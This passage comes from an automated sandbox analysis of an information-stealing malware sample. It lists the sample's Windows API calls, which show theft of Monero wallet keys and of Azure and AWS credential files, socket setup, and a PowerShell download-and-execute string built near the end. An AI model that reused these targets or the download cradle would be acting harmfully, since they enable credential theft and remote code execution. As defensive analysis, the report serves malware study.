                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                              • String ID:
                              • API String ID: 2857443207-0
                              • Opcode ID: 05871a40b7fadcf3f069a63216cddcdc1be18a537cba561f231d4c82037b5009
                              • Instruction ID: 2348dea55db47f67e7738db4694f6e28cd10c75b238eb8bea291a2993ab3a864
                              • Opcode Fuzzy Hash: 05871a40b7fadcf3f069a63216cddcdc1be18a537cba561f231d4c82037b5009
                              • Instruction Fuzzy Hash: 0FE15F31A113169FCB21EFA4D98DAAE7BF9AF44304F046068FA85B7215DB35DD05CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46445
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46480
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E464AA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E464E1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46506
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4650E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46537
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FolderPathlstrcat
                              • String ID: \..\
                              • API String ID: 2938889746-4220915743
                              • Opcode ID: fe103978ab3bd7d56ce2ffb46ad1c98afc4f3966c7f1121480c49d5110df9cb9
                              • Instruction ID: 5fd240451bbb20d341798ff44259620712e3647792bb6158775b181f5612494d
                              • Opcode Fuzzy Hash: fe103978ab3bd7d56ce2ffb46ad1c98afc4f3966c7f1121480c49d5110df9cb9
                              • Instruction Fuzzy Hash: E7F1CE70A003059FCB21AF68E84DAAE7BF4AF45308F14A468F995F7255DB38DC45CB92
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E443A3
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E443D6
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E443FE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E44409
                              • lstrlen.KERNEL32(\storage\default\), ref: 00E44414
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44431
                              • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00E4443D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44466
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E44471
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44498
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E444D7
                              • lstrcat.KERNEL32(00000000,?), ref: 00E444DF
                              • lstrlen.KERNEL32(00E61794), ref: 00E444EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44507
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E44513
                              • lstrlen.KERNEL32(.metadata-v2), ref: 00E4451E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4453B
                              • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00E44547
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4456E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E445A0
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E445A7
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44601
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4462A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44653
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4467B
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E446AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                              • String ID: .metadata-v2$\storage\default\
                              • API String ID: 1033685851-762053450
                              • Opcode ID: 9c6f3ecabcac0d58ccc9c92feada7b7858de3c6908a99fcfd58232f628ee2491
                              • Instruction ID: 893e24141ea10bd683136d54d454e45bc3112655161fdbb955ab8e29d951ed8e
                              • Opcode Fuzzy Hash: 9c6f3ecabcac0d58ccc9c92feada7b7858de3c6908a99fcfd58232f628ee2491
                              • Instruction Fuzzy Hash: 07B16CB1A113059FDB21AF78E849BAE7BE8AF40708F156428F985F7291DB35DD01CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E457D5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E45804
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45835
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4585D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E45868
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45890
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E458C8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E458D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E458F8
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4592E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45956
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E45961
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45988
                              • lstrlen.KERNEL32(00E61794), ref: 00E4599A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E459B9
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E459C5
                              • lstrlen.KERNEL32(00D2E030), ref: 00E459D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E459F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E45A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45A2C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45A58
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E45A5F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E45AB7
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E45B2D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E45B56
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E45B89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45BB5
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E45BEF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E45C4C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45C70
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2428362635-0
                              • Opcode ID: 717eb8c0033a5e8d06c0e19d4769fa0e9aa07f4ac512f341f40316f198df0a5c
                              • Instruction ID: 1704217bc8c9df8963cd339900241551391b4d60d927335b5c0762be32d644c0
                              • Opcode Fuzzy Hash: 717eb8c0033a5e8d06c0e19d4769fa0e9aa07f4ac512f341f40316f198df0a5c
                              • Instruction Fuzzy Hash: 0602B372A017059FCB21EF68E889AAE7BF5AF44304F14612CF985B7252DB35DC45CB90
                              APIs
                                • Part of subcall function 00E31120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E31135
                                • Part of subcall function 00E31120: RtlAllocateHeap.NTDLL(00000000), ref: 00E3113C
                                • Part of subcall function 00E31120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00E31159
                                • Part of subcall function 00E31120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00E31173
                                • Part of subcall function 00E31120: RegCloseKey.ADVAPI32(?), ref: 00E3117D
                              • lstrcat.KERNEL32(?,00000000), ref: 00E311C0
                              • lstrlen.KERNEL32(?), ref: 00E311CD
                              • lstrcat.KERNEL32(?,.keys), ref: 00E311E8
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3121F
                              • lstrlen.KERNEL32(00D28C08), ref: 00E3122D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31251
                              • lstrcat.KERNEL32(00000000,00D28C08), ref: 00E31259
                              • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00E31264
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31288
                              • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00E31294
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E312BA
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E312FF
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E3130E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31335
                              • lstrcat.KERNEL32(00000000,?), ref: 00E3133D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31378
                              • lstrcat.KERNEL32(00000000), ref: 00E31385
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E313AC
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00E313D5
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31401
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3143D
                                • Part of subcall function 00E4EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00E4EE12
                              • DeleteFileA.KERNEL32(?), ref: 00E31471
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                              • String ID: .keys$\Monero\wallet.keys
                              • API String ID: 2881711868-3586502688
                              • Opcode ID: d39a429570629799fe2b53e4589bcd681b9b02bdc93aa0d17a8e18fca5386255
                              • Instruction ID: 05fc6e524dd1467064462daafc483a546c3a7d30d98f3f43c2f5a9ccfb19b9a9
                              • Opcode Fuzzy Hash: d39a429570629799fe2b53e4589bcd681b9b02bdc93aa0d17a8e18fca5386255
                              • Instruction Fuzzy Hash: 7DA16B71A102059BCB21EBA4D88DAAE7BF9AF44304F056468FA85F7251DB35ED05CBA0
                              APIs
                              • memset.MSVCRT ref: 00E4E740
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E4E769
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E79F
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E7AD
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00E4E7C6
                              • memset.MSVCRT ref: 00E4E805
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E4E82D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E85F
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E86D
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00E4E886
                              • memset.MSVCRT ref: 00E4E8C5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4E8F1
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E920
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E92E
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E4E947
                              • memset.MSVCRT ref: 00E4E986
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$memset$FolderPathlstrcpy
                              • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 4067350539-3645552435
                              • Opcode ID: 9207e1a4c036b6cec531ff4c3d97005f0da1c5bc0e6c8afe6ef7642ad9ca3e82
                              • Instruction ID: 498fafb2698c21ae142cb19a33f3c0a6c75ec1acbc21b376b46778f48abe2dda
                              • Opcode Fuzzy Hash: 9207e1a4c036b6cec531ff4c3d97005f0da1c5bc0e6c8afe6ef7642ad9ca3e82
                              • Instruction Fuzzy Hash: A971C871A40318AFDB21EB64DC4AFED77B4BF48704F102898B759BB1C1DAB49A448B94
                              APIs
                              • lstrcpy.KERNEL32 ref: 00E4ABCF
                              • lstrlen.KERNEL32(00D2F338), ref: 00E4ABE5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AC0D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4AC18
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AC41
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AC84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4AC8E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4ACB7
                              • lstrlen.KERNEL32(00E64AD4), ref: 00E4ACD1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4ACF3
                              • lstrcat.KERNEL32(00000000,00E64AD4), ref: 00E4ACFF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AD28
                              • lstrlen.KERNEL32(00E64AD4), ref: 00E4AD3A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AD5C
                              • lstrcat.KERNEL32(00000000,00E64AD4), ref: 00E4AD68
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AD91
                              • lstrlen.KERNEL32(00D2F140), ref: 00E4ADA7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4ADCF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4ADDA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AE03
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4AE3F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4AE49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AE6F
                              • lstrlen.KERNEL32(00000000), ref: 00E4AE85
                              • lstrcpy.KERNEL32(00000000,00D2F170), ref: 00E4AEB8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen
                              • String ID: f
                              • API String ID: 2762123234-1993550816
                              • Opcode ID: 32a389403c35f4ef112d32f947fa70d93b6259d89cdd1abd242d0bbdc4396ac9
                              • Instruction ID: e98fd09026864aab0f070b26b02f2441cdc168c61c2dfcbbd1b44c05ec3b034b
                              • Opcode Fuzzy Hash: 32a389403c35f4ef112d32f947fa70d93b6259d89cdd1abd242d0bbdc4396ac9
                              • Instruction Fuzzy Hash: FCB19F309506169FCB21EF68E84CAAFBBB9AF40318F086428F995B7655DB35DD00CB91
                              APIs
                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,00E472A4), ref: 00E547E6
                              • GetProcAddress.KERNEL32(00000000,connect), ref: 00E547FC
                              • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00E5480D
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00E5481E
                              • GetProcAddress.KERNEL32(00000000,htons), ref: 00E5482F
                              • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00E54840
                              • GetProcAddress.KERNEL32(00000000,recv), ref: 00E54851
                              • GetProcAddress.KERNEL32(00000000,socket), ref: 00E54862
                              • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00E54873
                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00E54884
                              • GetProcAddress.KERNEL32(00000000,send), ref: 00E54895
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                              • API String ID: 2238633743-3087812094
                              • Opcode ID: 1e7f43110896668c55732681d5e0f6723b08bae2044d871e53f0553488a5099b
                              • Instruction ID: 054d204229caa934db3594434ac37b857296d8164f89744622074a3c680a1431
                              • Opcode Fuzzy Hash: 1e7f43110896668c55732681d5e0f6723b08bae2044d871e53f0553488a5099b
                              • Instruction Fuzzy Hash: 1411C972AD7B20AFD7309FF4BC0DA563AB8BA0A789704581BF5D1E2568D6FE4010DB50
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4BE53
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4BE86
                              • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00E4BE91
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4BEB1
                              • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00E4BEBD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BEE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4BEEB
                              • lstrlen.KERNEL32(')"), ref: 00E4BEF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BF13
                              • lstrcat.KERNEL32(00000000,')"), ref: 00E4BF1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BF46
